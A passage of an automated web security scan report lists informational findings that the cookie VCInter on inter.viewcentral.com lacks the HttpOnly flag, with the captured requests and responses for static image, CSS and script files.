Last-Modified: Fri, 18 Feb 2005 19:55:44 GMT
Accept-Ranges: bytes
ETag: "020b8d4f315c51:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

GIF89a..".......3..f............3.33.f3..3..3..3..f.3f.ff..f..f..f....3..f..............3..f..............3..f.............33.3f.3..3..3..3.33333f33.33.33.33.f33f3ff3.f3.f3.f3..33.3f.3..3..3..3..33.3f
...[SNIP]...

18.299. https://inter.viewcentral.com/events/images/loading_0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/loading_0.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/loading_0.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 7076
Content-Type: image/gif
Last-Modified: Sat, 24 May 2008 02:06:10 GMT
Accept-Ranges: bytes
ETag: "ee7f88bc42bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

GIF89a . ..........................................................................................................w.w.........f.f........................S.S...............J.JB.B...............y.y....
...[SNIP]...

18.300. https://inter.viewcentral.com/events/images/loading_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/loading_1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/loading_1.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 7076
Content-Type: image/gif
Last-Modified: Sat, 24 May 2008 02:06:31 GMT
Accept-Ranges: bytes
ETag: "3c9ca8c842bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

GIF89a . ..........................................................................................................w.w.........f.f........................S.S...............J.JB.B...............y.y....
...[SNIP]...

18.301. https://inter.viewcentral.com/events/images/loading_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/loading_2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/loading_2.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 7076
Content-Type: image/gif
Last-Modified: Sat, 24 May 2008 02:06:49 GMT
Accept-Ranges: bytes
ETag: "73add342bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

GIF89a . ..........................................................................................................w.w.........f.f........................S.S...............J.JB.B...............y.y....
...[SNIP]...

18.302. https://inter.viewcentral.com/events/images/loading_3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/loading_3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/loading_3.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 7076
Content-Type: image/gif
Last-Modified: Sat, 24 May 2008 02:07:10 GMT
Accept-Ranges: bytes
ETag: "a7f6e4df42bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

GIF89a . ..........................................................................................................w.w.........f.f........................S.S...............J.JB.B...............y.y....
...[SNIP]...

18.303. https://inter.viewcentral.com/events/images/poweredby1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/poweredby1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/poweredby1.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 2242
Content-Type: image/gif
Last-Modified: Tue, 03 Apr 2007 00:46:24 GMT
Accept-Ranges: bytes
ETag: "f4b629818975c71:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

GIF89a..*........7~@i.............D.`........0]................ P.Pv.......p..wtu.................u.m..i".................................................7~...Ga....p..6U.
<..;.;Y.$K.................
...[SNIP]...

18.304. https://inter.viewcentral.com/events/incl/BusyBox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/incl/BusyBox.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/incl/BusyBox.js HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 3465
Content-Type: application/x-javascript
Last-Modified: Sat, 24 May 2008 02:09:13 GMT
Accept-Ranges: bytes
ETag: "14fc232943bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT


// Define the BusyBox class (function)
function BusyBox(id, instanceVarName, imageCount, imageName, imageExt, imageDelay, width, height, url)
{
   // Initialize object
   this.id = id;
   this.Imag
...[SNIP]...

18.305. https://inter.viewcentral.com/events/uploads/arcsight/ae.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/ae.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/ae.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 878
Content-Type: image/png
Last-Modified: Wed, 19 May 2010 23:04:50 GMT
Accept-Ranges: bytes
ETag: "d4907aafa7f7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

.PNG
.
...IHDR.............,.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W1r.@..:...:D.....]x..V...    ..e.    .    ...:..e...I..R..j.v..TM.@..loO3<l...f.g...6..\..LK.o.k$6.......M...OH..y.Tlp.bm..K.    
...[SNIP]...

18.306. https://inter.viewcentral.com/events/uploads/arcsight/arrow_red_dn.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/arrow_red_dn.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/arrow_red_dn.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 167
Content-Type: image/gif
Last-Modified: Tue, 30 Mar 2010 19:59:13 GMT
Accept-Ranges: bytes
ETag: "b8da2c7843d0ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

GIF89a    .    ..............99.??.''.KK.......99....00.00.......''.KK.......KK.......KK...........................!.......,....    .    ...$`&.di.....4)M.a.uN.,4.....R..$......;

18.307. https://inter.viewcentral.com/events/uploads/arcsight/arrow_red_rt.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/arrow_red_rt.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/arrow_red_rt.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 169
Content-Type: image/gif
Last-Modified: Tue, 30 Mar 2010 19:59:17 GMT
Accept-Ranges: bytes
ETag: "4e70e77a43d0ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

GIF89a    .    ..............99.??.''.KK.......99....00.00.......''.KK.......KK.......KK...........................!.......,....    .    ...&`.).h.......,DQEt.UN...=..fq`Y..V&.`...;

18.308. https://inter.viewcentral.com/events/uploads/arcsight/asu_css.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/asu_css.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/asu_css.css HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4025
Content-Type: text/css
Last-Modified: Thu, 08 Apr 2010 17:51:56 GMT
Accept-Ranges: bytes
ETag: "4c7f3a2e44d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:34 GMT

body {
   background: #cccccc url(https://inter.viewcentral.com/events/uploads/arcsight/bg_arstmain.jpg) repeat-x top;
   margin: 0;
   padding: 0 0 20px 0;
   text-align: left;
   color: #000000;
   font:
...[SNIP]...

18.309. https://inter.viewcentral.com/events/uploads/arcsight/asu_masthead_v02.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/asu_masthead_v02.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/asu_masthead_v02.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 54119
Content-Type: image/png
Last-Modified: Wed, 26 Jan 2011 18:22:57 GMT
Accept-Ranges: bytes
ETag: "a65175e86bdcb1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

.PNG
.
...IHDR.......D.............tEXtSoftware.Adobe ImageReadyq.e<...niTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

18.310. https://inter.viewcentral.com/events/uploads/arcsight/bg_arstfooter.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_arstfooter.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_arstfooter.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 569
Content-Type: image/jpeg
Last-Modified: Thu, 01 Apr 2010 22:25:49 GMT
Accept-Ranges: bytes
ETag: "8649ea47ead1ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................A....
...[SNIP]...

18.311. https://inter.viewcentral.com/events/uploads/arcsight/bg_arstmain.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_arstmain.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_arstmain.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 569
Content-Type: image/jpeg
Last-Modified: Tue, 30 Mar 2010 19:59:34 GMT
Accept-Ranges: bytes
ETag: "c0bea78443d0ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................A....
...[SNIP]...

18.312. https://inter.viewcentral.com/events/uploads/arcsight/bg_container.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_container.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_container.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 477
Content-Type: image/jpeg
Last-Modified: Thu, 08 Apr 2010 17:45:33 GMT
Accept-Ranges: bytes
ETag: "3473c4a43d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

18.313. https://inter.viewcentral.com/events/uploads/arcsight/bg_page.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_page.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_page.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 178
Content-Type: image/gif
Last-Modified: Thu, 08 Apr 2010 17:36:25 GMT
Accept-Ranges: bytes
ETag: "94b3f5242d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

GIF89a.......................................................!.......,........................................................../..I..8....`(.di.h..l..p,.tm.x|.|....pH,.....8...;

18.314. https://inter.viewcentral.com/events/uploads/arcsight/bg_sectionhdr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_sectionhdr.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_sectionhdr.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4715
Content-Type: image/png
Last-Modified: Thu, 08 Apr 2010 17:36:44 GMT
Accept-Ranges: bytes
ETag: "de77afe42d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

.PNG
.
...IHDR..............y.L...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

18.315. https://inter.viewcentral.com/events/uploads/arcsight/catalog_employee.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/catalog_employee.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/catalog_employee.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 1768
Content-Type: image/png
Last-Modified: Wed, 28 Apr 2010 20:38:21 GMT
Accept-Ranges: bytes
ETag: "b30a8bd12e7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

.PNG
.
...IHDR.............L"......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.OTg.?..0(.C...6EIK..6......6.e..A.ug....&.Z...\...[LkH.T..G.T+.._<.a..y.....|....!....d.......s~..]..-K..j...C6....={
...[SNIP]...

18.316. https://inter.viewcentral.com/events/uploads/arcsight/catalog_partner.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/catalog_partner.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/catalog_partner.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
